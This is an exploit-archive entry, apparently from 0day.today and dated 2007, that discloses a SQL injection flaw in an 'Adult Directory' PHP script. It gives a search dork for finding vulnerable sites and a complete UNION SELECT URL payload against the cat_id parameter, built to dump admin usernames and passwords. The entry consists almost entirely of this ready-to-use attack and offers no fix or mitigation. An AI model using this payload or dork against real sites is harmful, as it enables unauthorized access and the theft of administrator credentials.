id: 2051
date: 07/26/2007
title: Adult Directory (cat_id) Remote SQL Injection Vulnerability
author: t0pP8uZz
cves: 

===========================================================
Adult Directory (cat_id) Remote SQL Injection Vulnerability
===========================================================



--==+================================================================================+==--
--==+		    Adult Directory SQL Injection Vulnerbility  	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://photo.sourceforge.net/
DORK: altavista.com > "Search Adult Directory:"


DESCRIPTION: 
pull out admin login details

EXPLOITS:
http://server.com/directory.php?ax=list&sub=7&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/FROM/**/admin/*




#  0day.today [2023-03-22]  #